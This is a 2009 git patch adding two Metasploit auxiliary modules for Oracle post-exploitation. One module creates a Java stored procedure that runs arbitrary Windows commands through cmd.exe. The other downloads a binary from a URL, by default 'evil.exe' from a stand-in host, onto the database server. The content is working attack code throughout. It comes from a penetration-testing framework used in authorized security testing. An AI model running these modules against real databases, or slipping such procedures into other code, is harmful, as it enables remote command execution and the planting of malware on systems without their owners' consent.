From df18371123f7aeee1a0e4ce0cfd7c6aacb2e1918 Mon Sep 17 00:00:00 2001 From: cg <> Date: Wed, 29 Jul 2009 04:18:08 +0000 Subject: [PATCH] win32exec and win32upload modules for oracle post exploitation git-svn-id: file:///home/svn/framework3/trunk@6920 4d416f70-5f16-0410-b530-b9f4589650da --- .../oracle/post_exploitation/win32exec.rb | 87 ++++++++++++++++ .../oracle/post_exploitation/win32upload.rb | 99 +++++++++++++++++++ 2 files changed, 186 insertions(+) create mode 100755 modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb create mode 100755 modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb diff --git a/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb b/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb new file mode 100755 index 0000000000..d4e6b994d3 --- /dev/null +++ b/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb @@ -0,0 +1,87 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::ORACLE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Execute win32 OS commands', + 'Description' => %q{ + This module will create a java class which enables the execution of OS commands. + }, + 'Author' => [ 'MC' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision:$', + 'References' => + [ + [ 'URL', 'https://www.metasploit.com/users/mc' ], + ], + 'DisclosureDate' => 'Dec 7 2007')) + + register_options( + [ + OptString.new('CMD', [ false, 'The OS command to execute.', 'echo metasploit > %SYSTEMDRIVE%\\\\unbreakable.txt']), + ], self.class) + end + + def run + # use oracle_sql if a java error occurs. "grant javasyspriv to " + + source = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + + java = " + create or replace and resolve java source named \"#{source}\" as + import java.lang.*; + import java.io.*; + public class #{source} + { + public static void execCommand (String command) throws IOException + { + Runtime.getRuntime().exec(command); + } + }; + " + + procedure = " + create or replace procedure #{name} (p_command in varchar2) + as language java + name '#{source}.execCommand (java.lang.String)'; + " + + exec = "begin #{name}('cmd.exe /c #{datastore['CMD']}'); end;" + + drops = "drop java source #{source}" + + dropp = "drop procedure #{name}" + + begin + print_status("Creating java source '#{source}'...") + prepare_exec(java) + rescue => e + return + end + + print_status("Creating procedure '#{name}'...") + prepare_exec(procedure) + + print_status("Sending command: '#{datastore['CMD']}'") + prepare_exec(exec) + + print_status("Removing java source '#{source}'...") + prepare_exec(drops) + + print_status("Removing procedure '#{name}'...") + prepare_exec(dropp) + + end + +end diff --git a/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb b/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb new file mode 100755 index 0000000000..1425b71a9d --- /dev/null +++ b/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb @@ -0,0 +1,99 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::ORACLE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Execute win32 OS commands', + 'Description' => %q{ + This module will create a java class which enables the download of a binary from a webserver to the oracle filesystem. + }, + 'Author' => [ 'CG' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision:$', + 'References' => + [ + [ 'URL', 'http://www.argeniss.com/research/oraclesqlinj.zip' ], + ], + 'DisclosureDate' => 'Feb 2003')) + + register_options( + [ + OptString.new('URL', [ false, 'The URL to download the binary from.', 'http://www.meh.com/evil.exe']), + OptString.new('COPYTO', [ false, 'Location to copy the binary to', 'c:\\meh.exe']), + ], self.class) + end + + def run + # use oracle_sql if a java error occurs. "grant javasyspriv to " + + #source = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + #name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + #create or replace and resolve java source named \"#{source}\" as + + java = " + CREATE OR REPLACE JAVA SOURCE NAMED SRC_FILE_UPLOAD AS + import java.lang.*; + import java.io.*; + public class FileUpload + { + public static void fileUpload(String myFile, String url) throws IOException + { + File binaryFile = new File(myFile); + FileOutputStream outStream = new FileOutputStream(binaryFile); + java.net.URL u = new java.net.URL(url); + java.net.URLConnection uc = u.openConnection(); + InputStream is = (InputStream)uc.getInputStream(); + BufferedReader in = new BufferedReader (new InputStreamReader (is)); + byte buffer[] = new byte[1024]; + int length = -1; + while ((length = is.read(buffer)) != -1) { + outStream.write(buffer, 0, length); + outStream.flush(); } + is.close(); outStream.close(); + } };; + " + + procedure = " + CREATE OR REPLACE PROCEDURE PROC_FILEUPLOAD (p_file varchar2, p_url varchar2) + as language java + NAME 'FileUpload.fileUpload (java.lang.String, java.lang.String)'; + " + + exec = "begin PROC_FILEUPLOAD ('#{datastore['COPYTO']}', '#{datastore['URL']}'); end;" + + drops = "drop java source SRC_FILE_UPLOAD" + + dropp = "drop procedure PROC_FILEUPLOAD" + + begin + print_status("Creating java source 'SRC_FILE_UPLOAD'...") + prepare_exec(java) + rescue => e + return + end + + print_status("Creating procedure 'PROC_FILEUPLOAD'...") + prepare_exec(procedure) + + print_status("Trying to download binary from #{datastore['URL']} to #{datastore['COPYTO']}") + prepare_exec(exec) + + print_status("Removing java source 'SRC_FILE_UPLOAD'...") + prepare_exec(drops) + + print_status("Removing procedure 'PROC_FILEUPLOAD'...") + prepare_exec(dropp) + + end + +end